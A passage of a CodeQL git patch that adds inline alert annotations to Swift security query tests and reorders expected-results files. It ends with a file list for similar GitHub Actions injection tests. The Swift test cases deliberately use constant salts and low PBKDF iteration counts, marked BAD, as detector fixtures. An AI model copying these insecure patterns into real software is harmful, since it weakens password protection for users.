sanitized by the check) [FALSE POSITIVE] + _ = try Regex(taintedString).firstMatch(in: varString) // GOOD (effectively sanitized by the check) [FALSE POSITIVE] // $ Alert } // --- multiple evaluations --- - let re = try Regex(taintedString) // BAD + let re = try Regex(taintedString) // BAD // $ Alert _ = try re.firstMatch(in: varString) // (we only want to flag one location total) _ = try re.firstMatch(in: varString) } diff --git a/swift/ql/test/query-tests/Security/CWE-757/InsecureTLS.qlref b/swift/ql/test/query-tests/Security/CWE-757/InsecureTLS.qlref index af89770b496a..a2ddbdf1d14b 100644 --- a/swift/ql/test/query-tests/Security/CWE-757/InsecureTLS.qlref +++ b/swift/ql/test/query-tests/Security/CWE-757/InsecureTLS.qlref @@ -1 +1 @@ -queries/Security/CWE-757/InsecureTLS.ql +query: queries/Security/CWE-757/InsecureTLS.ql diff --git a/swift/ql/test/query-tests/Security/CWE-760/ConstantSalt.expected b/swift/ql/test/query-tests/Security/CWE-760/ConstantSalt.expected index 002454a3021d..d9388214b4b8 100644 --- a/swift/ql/test/query-tests/Security/CWE-760/ConstantSalt.expected +++ b/swift/ql/test/query-tests/Security/CWE-760/ConstantSalt.expected @@ -1,3 +1,22 @@ +#select +| rncryptor.swift:63:57:63:57 | myConstantSalt1 | rncryptor.swift:59:29:59:29 | abcdef123456 | rncryptor.swift:63:57:63:57 | myConstantSalt1 | The value $@ is used as a constant, which is insecure for hashing passwords. | rncryptor.swift:59:29:59:29 | abcdef123456 | abcdef123456 | +| rncryptor.swift:65:55:65:55 | myConstantSalt2 | rncryptor.swift:60:29:60:29 | 0 | rncryptor.swift:65:55:65:55 | myConstantSalt2 | The value $@ is used as a constant, which is insecure for hashing passwords. | rncryptor.swift:60:29:60:29 | 0 | 0 | +| rncryptor.swift:68:106:68:106 | myConstantSalt1 | rncryptor.swift:59:29:59:29 | abcdef123456 | rncryptor.swift:68:106:68:106 | myConstantSalt1 | The value $@ is used as a constant, which is insecure for hashing passwords. | rncryptor.swift:59:29:59:29 | abcdef123456 | abcdef123456 | +| rncryptor.swift:69:131:69:131 | myConstantSalt2 | rncryptor.swift:60:29:60:29 | 0 | rncryptor.swift:69:131:69:131 | myConstantSalt2 | The value $@ is used as a constant, which is insecure for hashing passwords. | rncryptor.swift:60:29:60:29 | 0 | 0 | +| rncryptor.swift:71:106:71:106 | myConstantSalt1 | rncryptor.swift:59:29:59:29 | abcdef123456 | rncryptor.swift:71:106:71:106 | myConstantSalt1 | The value $@ is used as a constant, which is insecure for hashing passwords. | rncryptor.swift:59:29:59:29 | abcdef123456 | abcdef123456 | +| rncryptor.swift:72:131:72:131 | myConstantSalt2 | rncryptor.swift:60:29:60:29 | 0 | rncryptor.swift:72:131:72:131 | myConstantSalt2 | The value $@ is used as a constant, which is insecure for hashing passwords. | rncryptor.swift:60:29:60:29 | 0 | 0 | +| rncryptor.swift:75:127:75:127 | myConstantSalt1 | rncryptor.swift:59:29:59:29 | abcdef123456 | rncryptor.swift:75:127:75:127 | myConstantSalt1 | The value $@ is used as a constant, which is insecure for hashing passwords. | rncryptor.swift:59:29:59:29 | abcdef123456 | abcdef123456 | +| rncryptor.swift:76:152:76:152 | myConstantSalt2 | rncryptor.swift:60:29:60:29 | 0 | rncryptor.swift:76:152:76:152 | myConstantSalt2 | The value $@ is used as a constant, which is insecure for hashing passwords. | rncryptor.swift:60:29:60:29 | 0 | 0 | +| rncryptor.swift:78:135:78:135 | myConstantSalt1 | rncryptor.swift:59:29:59:29 | abcdef123456 | rncryptor.swift:78:135:78:135 | myConstantSalt1 | The value $@ is used as a constant, which is insecure for hashing passwords. | rncryptor.swift:59:29:59:29 | abcdef123456 | abcdef123456 | +| rncryptor.swift:79:160:79:160 | myConstantSalt2 | rncryptor.swift:60:29:60:29 | 0 | rncryptor.swift:79:160:79:160 | myConstantSalt2 | The value $@ is used as a constant, which is insecure for hashing passwords. | rncryptor.swift:60:29:60:29 | 0 | 0 | +| test.swift:51:49:51:49 | constantSalt | test.swift:43:35:43:130 | [...] | test.swift:51:49:51:49 | constantSalt | The value $@ is used as a constant, which is insecure for hashing passwords. | test.swift:43:35:43:130 | [...] | [...] | +| test.swift:52:49:52:49 | constantStringSalt | test.swift:29:3:29:3 | this string is constant | test.swift:52:49:52:49 | constantStringSalt | The value $@ is used as a constant, which is insecure for hashing passwords. | test.swift:29:3:29:3 | this string is constant | this string is constant | +| test.swift:56:59:56:59 | constantSalt | test.swift:43:35:43:130 | [...] | test.swift:56:59:56:59 | constantSalt | The value $@ is used as a constant, which is insecure for hashing passwords. | test.swift:43:35:43:130 | [...] | [...] | +| test.swift:57:59:57:59 | constantStringSalt | test.swift:29:3:29:3 | this string is constant | test.swift:57:59:57:59 | constantStringSalt | The value $@ is used as a constant, which is insecure for hashing passwords. | test.swift:29:3:29:3 | this string is constant | this string is constant | +| test.swift:62:59:62:59 | constantSalt | test.swift:43:35:43:130 | [...] | test.swift:62:59:62:59 | constantSalt | The value $@ is used as a constant, which is insecure for hashing passwords. | test.swift:43:35:43:130 | [...] | [...] | +| test.swift:63:59:63:59 | constantStringSalt | test.swift:29:3:29:3 | this string is constant | test.swift:63:59:63:59 | constantStringSalt | The value $@ is used as a constant, which is insecure for hashing passwords. | test.swift:29:3:29:3 | this string is constant | this string is constant | +| test.swift:67:53:67:53 | constantSalt | test.swift:43:35:43:130 | [...] | test.swift:67:53:67:53 | constantSalt | The value $@ is used as a constant, which is insecure for hashing passwords. | test.swift:43:35:43:130 | [...] | [...] | +| test.swift:68:53:68:53 | constantStringSalt | test.swift:29:3:29:3 | this string is constant | test.swift:68:53:68:53 | constantStringSalt | The value $@ is used as a constant, which is insecure for hashing passwords. | test.swift:29:3:29:3 | this string is constant | this string is constant | edges | rncryptor.swift:59:24:59:43 | call to Data.init(_:) | rncryptor.swift:63:57:63:57 | myConstantSalt1 | provenance | | | rncryptor.swift:59:24:59:43 | call to Data.init(_:) | rncryptor.swift:68:106:68:106 | myConstantSalt1 | provenance | | @@ -53,22 +72,3 @@ nodes | test.swift:67:53:67:53 | constantSalt | semmle.label | constantSalt | | test.swift:68:53:68:53 | constantStringSalt | semmle.label | constantStringSalt | subpaths -#select -| rncryptor.swift:63:57:63:57 | myConstantSalt1 | rncryptor.swift:59:29:59:29 | abcdef123456 | rncryptor.swift:63:57:63:57 | myConstantSalt1 | The value $@ is used as a constant, which is insecure for hashing passwords. | rncryptor.swift:59:29:59:29 | abcdef123456 | abcdef123456 | -| rncryptor.swift:65:55:65:55 | myConstantSalt2 | rncryptor.swift:60:29:60:29 | 0 | rncryptor.swift:65:55:65:55 | myConstantSalt2 | The value $@ is used as a constant, which is insecure for hashing passwords. | rncryptor.swift:60:29:60:29 | 0 | 0 | -| rncryptor.swift:68:106:68:106 | myConstantSalt1 | rncryptor.swift:59:29:59:29 | abcdef123456 | rncryptor.swift:68:106:68:106 | myConstantSalt1 | The value $@ is used as a constant, which is insecure for hashing passwords. | rncryptor.swift:59:29:59:29 | abcdef123456 | abcdef123456 | -| rncryptor.swift:69:131:69:131 | myConstantSalt2 | rncryptor.swift:60:29:60:29 | 0 | rncryptor.swift:69:131:69:131 | myConstantSalt2 | The value $@ is used as a constant, which is insecure for hashing passwords. | rncryptor.swift:60:29:60:29 | 0 | 0 | -| rncryptor.swift:71:106:71:106 | myConstantSalt1 | rncryptor.swift:59:29:59:29 | abcdef123456 | rncryptor.swift:71:106:71:106 | myConstantSalt1 | The value $@ is used as a constant, which is insecure for hashing passwords. | rncryptor.swift:59:29:59:29 | abcdef123456 | abcdef123456 | -| rncryptor.swift:72:131:72:131 | myConstantSalt2 | rncryptor.swift:60:29:60:29 | 0 | rncryptor.swift:72:131:72:131 | myConstantSalt2 | The value $@ is used as a constant, which is insecure for hashing passwords. | rncryptor.swift:60:29:60:29 | 0 | 0 | -| rncryptor.swift:75:127:75:127 | myConstantSalt1 | rncryptor.swift:59:29:59:29 | abcdef123456 | rncryptor.swift:75:127:75:127 | myConstantSalt1 | The value $@ is used as a constant, which is insecure for hashing passwords. | rncryptor.swift:59:29:59:29 | abcdef123456 | abcdef123456 | -| rncryptor.swift:76:152:76:152 | myConstantSalt2 | rncryptor.swift:60:29:60:29 | 0 | rncryptor.swift:76:152:76:152 | myConstantSalt2 | The value $@ is used as a constant, which is insecure for hashing passwords. | rncryptor.swift:60:29:60:29 | 0 | 0 | -| rncryptor.swift:78:135:78:135 | myConstantSalt1 | rncryptor.swift:59:29:59:29 | abcdef123456 | rncryptor.swift:78:135:78:135 | myConstantSalt1 | The value $@ is used as a constant, which is insecure for hashing passwords. | rncryptor.swift:59:29:59:29 | abcdef123456 | abcdef123456 | -| rncryptor.swift:79:160:79:160 | myConstantSalt2 | rncryptor.swift:60:29:60:29 | 0 | rncryptor.swift:79:160:79:160 | myConstantSalt2 | The value $@ is used as a constant, which is insecure for hashing passwords. | rncryptor.swift:60:29:60:29 | 0 | 0 | -| test.swift:51:49:51:49 | constantSalt | test.swift:43:35:43:130 | [...] | test.swift:51:49:51:49 | constantSalt | The value $@ is used as a constant, which is insecure for hashing passwords. | test.swift:43:35:43:130 | [...] | [...] | -| test.swift:52:49:52:49 | constantStringSalt | test.swift:29:3:29:3 | this string is constant | test.swift:52:49:52:49 | constantStringSalt | The value $@ is used as a constant, which is insecure for hashing passwords. | test.swift:29:3:29:3 | this string is constant | this string is constant | -| test.swift:56:59:56:59 | constantSalt | test.swift:43:35:43:130 | [...] | test.swift:56:59:56:59 | constantSalt | The value $@ is used as a constant, which is insecure for hashing passwords. | test.swift:43:35:43:130 | [...] | [...] | -| test.swift:57:59:57:59 | constantStringSalt | test.swift:29:3:29:3 | this string is constant | test.swift:57:59:57:59 | constantStringSalt | The value $@ is used as a constant, which is insecure for hashing passwords. | test.swift:29:3:29:3 | this string is constant | this string is constant | -| test.swift:62:59:62:59 | constantSalt | test.swift:43:35:43:130 | [...] | test.swift:62:59:62:59 | constantSalt | The value $@ is used as a constant, which is insecure for hashing passwords. | test.swift:43:35:43:130 | [...] | [...] | -| test.swift:63:59:63:59 | constantStringSalt | test.swift:29:3:29:3 | this string is constant | test.swift:63:59:63:59 | constantStringSalt | The value $@ is used as a constant, which is insecure for hashing passwords. | test.swift:29:3:29:3 | this string is constant | this string is constant | -| test.swift:67:53:67:53 | constantSalt | test.swift:43:35:43:130 | [...] | test.swift:67:53:67:53 | constantSalt | The value $@ is used as a constant, which is insecure for hashing passwords. | test.swift:43:35:43:130 | [...] | [...] | -| test.swift:68:53:68:53 | constantStringSalt | test.swift:29:3:29:3 | this string is constant | test.swift:68:53:68:53 | constantStringSalt | The value $@ is used as a constant, which is insecure for hashing passwords. | test.swift:29:3:29:3 | this string is constant | this string is constant | diff --git a/swift/ql/test/query-tests/Security/CWE-760/ConstantSalt.qlref b/swift/ql/test/query-tests/Security/CWE-760/ConstantSalt.qlref index 04aadc2161fc..dd7c483b0af2 100644 --- a/swift/ql/test/query-tests/Security/CWE-760/ConstantSalt.qlref +++ b/swift/ql/test/query-tests/Security/CWE-760/ConstantSalt.qlref @@ -1 +1,2 @@ -queries/Security/CWE-760/ConstantSalt.ql +query: queries/Security/CWE-760/ConstantSalt.ql +postprocess: utils/test/InlineExpectationsTestQuery.ql diff --git a/swift/ql/test/query-tests/Security/CWE-760/rncryptor.swift b/swift/ql/test/query-tests/Security/CWE-760/rncryptor.swift index 51265b16c457..8d5af54c67fe 100644 --- a/swift/ql/test/query-tests/Security/CWE-760/rncryptor.swift +++ b/swift/ql/test/query-tests/Security/CWE-760/rncryptor.swift @@ -56,27 +56,27 @@ func test(myPassword: String) { let myIV = Data(0) let myRandomSalt1 = Data(getARandomString()) let myRandomSalt2 = Data(getARandomString()) - let myConstantSalt1 = Data("abcdef123456") - let myConstantSalt2 = Data(0) + let myConstantSalt1 = Data("abcdef123456") // $ Source + let myConstantSalt2 = Data(0) // $ Source let _ = myEncryptor.key(forPassword: myPassword, salt: myRandomSalt1, settings: myKeyDerivationSettings) // GOOD - let _ = myEncryptor.key(forPassword: myPassword, salt: myConstantSalt1, settings: myKeyDerivationSettings) // BAD + let _ = myEncryptor.key(forPassword: myPassword, salt: myConstantSalt1, settings: myKeyDerivationSettings) // BAD // $ Alert let _ = myEncryptor.keyForPassword(myPassword, salt: myRandomSalt2, settings: myKeyDerivationSettings) // GOOD - let _ = myEncryptor.keyForPassword(myPassword, salt: myConstantSalt2, settings: myKeyDerivationSettings) // BAD + let _ = myEncryptor.keyForPassword(myPassword, salt: myConstantSalt2, settings: myKeyDerivationSettings) // BAD // $ Alert let _ = RNEncryptor(settings: kRNCryptorAES256Settings, password: myPassword, iv: myIV, encryptionSalt: myRandomSalt1, hmacSalt: myRandomSalt2, handler: myHandler) // GOOD - let _ = RNEncryptor(settings: kRNCryptorAES256Settings, password: myPassword, iv: myIV, encryptionSalt: myConstantSalt1, hmacSalt: myRandomSalt2, handler: myHandler) // BAD - let _ = RNEncryptor(settings: kRNCryptorAES256Settings, password: myPassword, iv: myIV, encryptionSalt: myRandomSalt1, hmacSalt: myConstantSalt2, handler: myHandler) // BAD + let _ = RNEncryptor(settings: kRNCryptorAES256Settings, password: myPassword, iv: myIV, encryptionSalt: myConstantSalt1, hmacSalt: myRandomSalt2, handler: myHandler) // BAD // $ Alert + let _ = RNEncryptor(settings: kRNCryptorAES256Settings, password: myPassword, iv: myIV, encryptionSalt: myRandomSalt1, hmacSalt: myConstantSalt2, handler: myHandler) // BAD // $ Alert let _ = RNEncryptor(settings: kRNCryptorAES256Settings, password: myPassword, IV: myIV, encryptionSalt: myRandomSalt1, HMACSalt: myRandomSalt2, handler: myHandler) // GOOD - let _ = RNEncryptor(settings: kRNCryptorAES256Settings, password: myPassword, IV: myIV, encryptionSalt: myConstantSalt1, HMACSalt: myRandomSalt2, handler: myHandler) // BAD - let _ = RNEncryptor(settings: kRNCryptorAES256Settings, password: myPassword, IV: myIV, encryptionSalt: myRandomSalt1, HMACSalt: myConstantSalt2, handler: myHandler) // BAD + let _ = RNEncryptor(settings: kRNCryptorAES256Settings, password: myPassword, IV: myIV, encryptionSalt: myConstantSalt1, HMACSalt: myRandomSalt2, handler: myHandler) // BAD // $ Alert + let _ = RNEncryptor(settings: kRNCryptorAES256Settings, password: myPassword, IV: myIV, encryptionSalt: myRandomSalt1, HMACSalt: myConstantSalt2, handler: myHandler) // BAD // $ Alert let _ = try? myEncryptor.encryptData(myData, with: kRNCryptorAES256Settings, password: myPassword, iv: myIV, encryptionSalt: myRandomSalt1, hmacSalt: myRandomSalt2) // GOOD - let _ = try? myEncryptor.encryptData(myData, with: kRNCryptorAES256Settings, password: myPassword, iv: myIV, encryptionSalt: myConstantSalt1, hmacSalt: myRandomSalt2) // BAD - let _ = try? myEncryptor.encryptData(myData, with: kRNCryptorAES256Settings, password: myPassword, iv: myIV, encryptionSalt: myRandomSalt1, hmacSalt: myConstantSalt2) // BAD + let _ = try? myEncryptor.encryptData(myData, with: kRNCryptorAES256Settings, password: myPassword, iv: myIV, encryptionSalt: myConstantSalt1, hmacSalt: myRandomSalt2) // BAD // $ Alert + let _ = try? myEncryptor.encryptData(myData, with: kRNCryptorAES256Settings, password: myPassword, iv: myIV, encryptionSalt: myRandomSalt1, hmacSalt: myConstantSalt2) // BAD // $ Alert let _ = try? myEncryptor.encryptData(myData, withSettings: kRNCryptorAES256Settings, password: myPassword, IV: myIV, encryptionSalt: myRandomSalt1, HMACSalt: myRandomSalt2) // GOOD - let _ = try? myEncryptor.encryptData(myData, withSettings: kRNCryptorAES256Settings, password: myPassword, IV: myIV, encryptionSalt: myConstantSalt1, HMACSalt: myRandomSalt2) // BAD - let _ = try? myEncryptor.encryptData(myData, withSettings: kRNCryptorAES256Settings, password: myPassword, IV: myIV, encryptionSalt: myRandomSalt1, HMACSalt: myConstantSalt2) // BAD + let _ = try? myEncryptor.encryptData(myData, withSettings: kRNCryptorAES256Settings, password: myPassword, IV: myIV, encryptionSalt: myConstantSalt1, HMACSalt: myRandomSalt2) // BAD // $ Alert + let _ = try? myEncryptor.encryptData(myData, withSettings: kRNCryptorAES256Settings, password: myPassword, IV: myIV, encryptionSalt: myRandomSalt1, HMACSalt: myConstantSalt2) // BAD // $ Alert // appending constants let _ = myEncryptor.key(forPassword: myPassword, salt: Data(getARandomString() + getARandomString()), settings: myKeyDerivationSettings) // GOOD diff --git a/swift/ql/test/query-tests/Security/CWE-760/test.swift b/swift/ql/test/query-tests/Security/CWE-760/test.swift index 434e2daf6dad..b967c76b0c64 100644 --- a/swift/ql/test/query-tests/Security/CWE-760/test.swift +++ b/swift/ql/test/query-tests/Security/CWE-760/test.swift @@ -26,7 +26,7 @@ final class Scrypt { // Helper functions func getConstantString() -> String { - "this string is constant" + "this string is constant" // $ Source } func getConstantArray() -> Array { @@ -40,7 +40,7 @@ func getRandomArray() -> Array { // --- tests --- func test() { - let constantSalt: Array = [0x2a, 0x3a, 0x80, 0x05, 0xaf, 0x46, 0x58, 0x2d, 0x66, 0x52, 0x10, 0xae, 0x86, 0xd3, 0x8e, 0x8f] + let constantSalt: Array = [0x2a, 0x3a, 0x80, 0x05, 0xaf, 0x46, 0x58, 0x2d, 0x66, 0x52, 0x10, 0xae, 0x86, 0xd3, 0x8e, 0x8f] // $ Source let constantStringSalt = getConstantArray() let randomSalt = getRandomArray() let randomArray = getRandomArray() @@ -48,23 +48,23 @@ func test() { let iterations = 120120 // HKDF test cases - let hkdfb1 = HKDF(password: randomArray, salt: constantSalt, info: randomArray, keyLength: 0, variant: variant) // BAD - let hkdfb2 = HKDF(password: randomArray, salt: constantStringSalt, info: randomArray, keyLength: 0, variant: variant) // BAD + let hkdfb1 = HKDF(password: randomArray, salt: constantSalt, info: randomArray, keyLength: 0, variant: variant) // BAD // $ Alert + let hkdfb2 = HKDF(password: randomArray, salt: constantStringSalt, info: randomArray, keyLength: 0, variant: variant) // BAD // $ Alert let hkdfg1 = HKDF(password: randomArray, salt: randomSalt, info: randomArray, keyLength: 0, variant: variant) // GOOD // PBKDF1 test cases - let pbkdf1b1 = PKCS5.PBKDF1(password: randomArray, salt: constantSalt, iterations: iterations, keyLength: 0) // BAD - let pbkdf1b2 = PKCS5.PBKDF1(password: randomArray, salt: constantStringSalt, iterations: iterations, keyLength: 0) // BAD + let pbkdf1b1 = PKCS5.PBKDF1(password: randomArray, salt: constantSalt, iterations: iterations, keyLength: 0) // BAD // $ Alert + let pbkdf1b2 = PKCS5.PBKDF1(password: randomArray, salt: constantStringSalt, iterations: iterations, keyLength: 0) // BAD // $ Alert let pbkdf1g1 = PKCS5.PBKDF1(password: randomArray, salt: randomSalt, iterations: iterations, keyLength: 0) // GOOD // PBKDF2 test cases - let pbkdf2b1 = PKCS5.PBKDF2(password: randomArray, salt: constantSalt, iterations: iterations, keyLength: 0) // BAD - let pbkdf2b2 = PKCS5.PBKDF2(password: randomArray, salt: constantStringSalt, iterations: iterations, keyLength: 0) // BAD + let pbkdf2b1 = PKCS5.PBKDF2(password: randomArray, salt: constantSalt, iterations: iterations, keyLength: 0) // BAD // $ Alert + let pbkdf2b2 = PKCS5.PBKDF2(password: randomArray, salt: constantStringSalt, iterations: iterations, keyLength: 0) // BAD // $ Alert let pbkdf2g1 = PKCS5.PBKDF2(password: randomArray, salt: randomSalt, iterations: iterations, keyLength: 0) // GOOD // Scrypt test cases - let scryptb1 = Scrypt(password: randomArray, salt: constantSalt, dkLen: 64, N: 16384, r: 8, p: 1) // BAD - let scryptb2 = Scrypt(password: randomArray, salt: constantStringSalt, dkLen: 64, N: 16384, r: 8, p: 1) // BAD + let scryptb1 = Scrypt(password: randomArray, salt: constantSalt, dkLen: 64, N: 16384, r: 8, p: 1) // BAD // $ Alert + let scryptb2 = Scrypt(password: randomArray, salt: constantStringSalt, dkLen: 64, N: 16384, r: 8, p: 1) // BAD // $ Alert let scryptg1 = Scrypt(password: randomArray, salt: randomSalt, dkLen: 64, N: 16384, r: 8, p: 1) // GOOD } diff --git a/swift/ql/test/query-tests/Security/CWE-916/InsufficientHashIterations.expected b/swift/ql/test/query-tests/Security/CWE-916/InsufficientHashIterations.expected index aff512f05123..a0b4f7370321 100644 --- a/swift/ql/test/query-tests/Security/CWE-916/InsufficientHashIterations.expected +++ b/swift/ql/test/query-tests/Security/CWE-916/InsufficientHashIterations.expected @@ -1,3 +1,8 @@ +#select +| test.swift:37:84:37:84 | lowIterations | test.swift:20:45:20:45 | 99999 | test.swift:37:84:37:84 | lowIterations | The value '99999' is an insufficient number of iterations for secure password hashing. | +| test.swift:38:84:38:84 | 80000 | test.swift:38:84:38:84 | 80000 | test.swift:38:84:38:84 | 80000 | The value '80000' is an insufficient number of iterations for secure password hashing. | +| test.swift:44:84:44:84 | lowIterations | test.swift:20:45:20:45 | 99999 | test.swift:44:84:44:84 | lowIterations | The value '99999' is an insufficient number of iterations for secure password hashing. | +| test.swift:45:84:45:84 | 80000 | test.swift:45:84:45:84 | 80000 | test.swift:45:84:45:84 | 80000 | The value '80000' is an insufficient number of iterations for secure password hashing. | edges | test.swift:20:45:20:45 | 99999 | test.swift:33:22:33:43 | call to getLowIterationCount() | provenance | | | test.swift:33:22:33:43 | call to getLowIterationCount() | test.swift:37:84:37:84 | lowIterations | provenance | | @@ -10,8 +15,3 @@ nodes | test.swift:44:84:44:84 | lowIterations | semmle.label | lowIterations | | test.swift:45:84:45:84 | 80000 | semmle.label | 80000 | subpaths -#select -| test.swift:37:84:37:84 | lowIterations | test.swift:20:45:20:45 | 99999 | test.swift:37:84:37:84 | lowIterations | The value '99999' is an insufficient number of iterations for secure password hashing. | -| test.swift:38:84:38:84 | 80000 | test.swift:38:84:38:84 | 80000 | test.swift:38:84:38:84 | 80000 | The value '80000' is an insufficient number of iterations for secure password hashing. | -| test.swift:44:84:44:84 | lowIterations | test.swift:20:45:20:45 | 99999 | test.swift:44:84:44:84 | lowIterations | The value '99999' is an insufficient number of iterations for secure password hashing. | -| test.swift:45:84:45:84 | 80000 | test.swift:45:84:45:84 | 80000 | test.swift:45:84:45:84 | 80000 | The value '80000' is an insufficient number of iterations for secure password hashing. | diff --git a/swift/ql/test/query-tests/Security/CWE-916/InsufficientHashIterations.qlref b/swift/ql/test/query-tests/Security/CWE-916/InsufficientHashIterations.qlref index 81a6dda0d0f0..66492b8441e5 100644 --- a/swift/ql/test/query-tests/Security/CWE-916/InsufficientHashIterations.qlref +++ b/swift/ql/test/query-tests/Security/CWE-916/InsufficientHashIterations.qlref @@ -1 +1,2 @@ -queries/Security/CWE-916/InsufficientHashIterations.ql +query: queries/Security/CWE-916/InsufficientHashIterations.ql +postprocess: utils/test/InlineExpectationsTestQuery.ql diff --git a/swift/ql/test/query-tests/Security/CWE-916/test.swift b/swift/ql/test/query-tests/Security/CWE-916/test.swift index 8786d936c1d3..6930adfe1052 100644 --- a/swift/ql/test/query-tests/Security/CWE-916/test.swift +++ b/swift/ql/test/query-tests/Security/CWE-916/test.swift @@ -17,7 +17,7 @@ extension PKCS5 { } // Helper functions -func getLowIterationCount() -> Int { return 99999 } +func getLowIterationCount() -> Int { return 99999 } // $ Source func getEnoughIterationCount() -> Int { return 120120 } @@ -34,15 +34,15 @@ func test() { let enoughIterations = getEnoughIterationCount() // PBKDF1 test cases - let pbkdf1b1 = PKCS5.PBKDF1(password: randomArray, salt: randomArray, iterations: lowIterations, keyLength: 0) // BAD - let pbkdf1b2 = PKCS5.PBKDF1(password: randomArray, salt: randomArray, iterations: 80000, keyLength: 0) // BAD + let pbkdf1b1 = PKCS5.PBKDF1(password: randomArray, salt: randomArray, iterations: lowIterations, keyLength: 0) // BAD // $ Alert + let pbkdf1b2 = PKCS5.PBKDF1(password: randomArray, salt: randomArray, iterations: 80000, keyLength: 0) // BAD // $ Alert let pbkdf1g1 = PKCS5.PBKDF1(password: randomArray, salt: randomArray, iterations: enoughIterations, keyLength: 0) // GOOD let pbkdf1g2 = PKCS5.PBKDF1(password: randomArray, salt: randomArray, iterations: 120120, keyLength: 0) // GOOD // PBKDF2 test cases - let pbkdf2b1 = PKCS5.PBKDF2(password: randomArray, salt: randomArray, iterations: lowIterations, keyLength: 0) // BAD - let pbkdf2b2 = PKCS5.PBKDF2(password: randomArray, salt: randomArray, iterations: 80000, keyLength: 0) // BAD + let pbkdf2b1 = PKCS5.PBKDF2(password: randomArray, salt: randomArray, iterations: lowIterations, keyLength: 0) // BAD // $ Alert + let pbkdf2b2 = PKCS5.PBKDF2(password: randomArray, salt: randomArray, iterations: 80000, keyLength: 0) // BAD // $ Alert let pbkdf2g1 = PKCS5.PBKDF2(password: randomArray, salt: randomArray, iterations: enoughIterations, keyLength: 0) // GOOD let pbkdf2g2 = PKCS5.PBKDF2(password: randomArray, salt: randomArray, iterations: 120120, keyLength: 0) // GOOD } From 4d2e16e97bfffd4a6337de1f6c433cb6dd15617d Mon Sep 17 00:00:00 2001 From: Owen Mansel-Chan Date: Wed, 10 Jun 2026 22:59:00 +0200 Subject: [PATCH 09/15] Actions --- .../.github/workflows/reusable_workflow.yml | 10 +- .../Models/CompositeActionsSinks.expected | 6 +- .../Models/CompositeActionsSinks.qlref | 3 +- .../Models/CompositeActionsSources.expected | 12 +- .../Models/CompositeActionsSources.qlref | 4 +- .../Models/CompositeActionsSummaries.expected | 4 +- .../Models/CompositeActionsSummaries.qlref | 4 +- .../Models/ReusableWorkflowsSinks.expected | 4 +- .../Models/ReusableWorkflowsSinks.qlref | 4 +- .../Models/ReusableWorkflowsSources.expected | 4 +- .../Models/ReusableWorkflowsSources.qlref | 4 +- .../ReusableWorkflowsSummaries.expected | 4 +- .../Models/ReusableWorkflowsSummaries.qlref | 4 +- .../query-tests/Models/action1/action.yml | 16 +- .../CWE-074/.github/workflows/output1.yml | 8 +- .../CWE-074/.github/workflows/output2.yml | 18 +- .../CWE-074/OutputClobberingHigh.expected | 18 +- .../CWE-074/OutputClobberingHigh.qlref | 3 +- .../.github/workflows/artifactpoisoning51.yml | 4 +- .../.github/workflows/artifactpoisoning52.yml | 4 +- .../.github/workflows/artifactpoisoning53.yml | 4 +- .../CWE-077/.github/workflows/path1.yml | 18 +- .../CWE-077/.github/workflows/test10.yml | 4 +- .../CWE-077/.github/workflows/test11.yml | 4 +- .../CWE-077/.github/workflows/test12.yml | 8 +- .../CWE-077/.github/workflows/test13.yml | 4 +- .../CWE-077/.github/workflows/test14.yml | 4 +- .../CWE-077/.github/workflows/test15.yml | 4 +- .../CWE-077/.github/workflows/test16.yml | 6 +- .../CWE-077/.github/workflows/test2.yml | 4 +- .../CWE-077/.github/workflows/test3.yml | 4 +- .../CWE-077/.github/workflows/test4.yml | 36 +- .../CWE-077/.github/workflows/test5.yml | 4 +- .../CWE-077/.github/workflows/test6.yml | 12 +- .../CWE-077/.github/workflows/test7.yml | 4 +- .../CWE-077/.github/workflows/test8.yml | 8 +- .../CWE-077/.github/workflows/test9.yml | 4 +- .../CWE-077/EnvPathInjectionCritical.expected | 12 +- .../CWE-077/EnvPathInjectionCritical.qlref | 3 +- .../CWE-077/EnvPathInjectionMedium.expected | 2 +- .../CWE-077/EnvPathInjectionMedium.qlref | 3 +- .../CWE-077/EnvVarInjectionCritical.expected | 74 ++-- .../CWE-077/EnvVarInjectionCritical.qlref | 3 +- .../CWE-077/EnvVarInjectionMedium.expected | 2 +- .../CWE-077/EnvVarInjectionMedium.qlref | 3 +- .../.github/workflows/comment_issue.yml | 2 +- .../CWE-078/CommandInjectionCritical.expected | 4 +- .../CWE-078/CommandInjectionCritical.qlref | 3 +- .../CWE-078/CommandInjectionMedium.expected | 2 +- .../CWE-078/CommandInjectionMedium.qlref | 3 +- .../.github/workflows/arg_injection.yml | 26 +- .../ArgumentInjectionCritical.expected | 26 +- .../CWE-088/ArgumentInjectionCritical.qlref | 3 +- .../CWE-088/ArgumentInjectionMedium.expected | 2 +- .../CWE-088/ArgumentInjectionMedium.qlref | 3 +- .../.github/actions/action1/action.yml | 2 +- .../.github/actions/action3/action.yml | 2 +- .../.github/actions/action4/action.yml | 2 +- .../.github/actions/action5/action.yml | 6 +- .../.github/actions/action6/action.yml | 2 +- .../.github/actions/action7/action.yml | 8 +- .../.github/actions/clone-repo/action.yaml | 2 +- .../external/ultralytics/actions/action.yaml | 4 +- .../.github/workflows/argus_case_study.yml | 4 +- .../.github/workflows/artifactpoisoning1.yml | 4 +- .../.github/workflows/artifactpoisoning2.yml | 4 +- .../.github/workflows/artifactpoisoning3.yml | 4 +- .../.github/workflows/artifactpoisoning4.yml | 4 +- .../.github/workflows/artifactpoisoning5.yml | 4 +- .../.github/workflows/artifactpoisoning6.yml | 6 +- .../.github/workflows/artifactpoisoning7.yml | 4 +- .../.github/workflows/artifactpoisoning8.yml | 4 +- .../.github/workflows/changed-files.yml | 12 +- .../.github/workflows/comment_issue.yml | 14 +- .../workflows/comment_issue_newline.yml | 6 +- .../workflows/composite-action-caller-3.yml | 6 +- .../workflows/composite-action-caller-4.yml | 4 +- .../CWE-094/.github/workflows/cross3.yml | 6 +- .../CWE-094/.github/workflows/discussion.yml | 4 +- .../.github/workflows/discussion_comment.yml | 6 +- .../.github/workflows/publishResults.yml | 4 +- .../.github/workflows/reusable-workflow.yml | 10 +- .../CWE-094/.github/workflows/gollum.yml | 8 +- .../workflows/image_link_generator.yml | 4 +- .../CWE-094/.github/workflows/inter-job0.yml | 4 +- .../CWE-094/.github/workflows/inter-job1.yml | 4 +- .../CWE-094/.github/workflows/inter-job2.yml | 4 +- .../CWE-094/.github/workflows/inter-job4.yml | 4 +- .../CWE-094/.github/workflows/inter-job5.yml | 2 +- .../CWE-094/.github/workflows/issues.yaml | 16 +- .../CWE-094/.github/workflows/json_wrap.yml | 4 +- .../CWE-094/.github/workflows/level0.yml | 4 +- 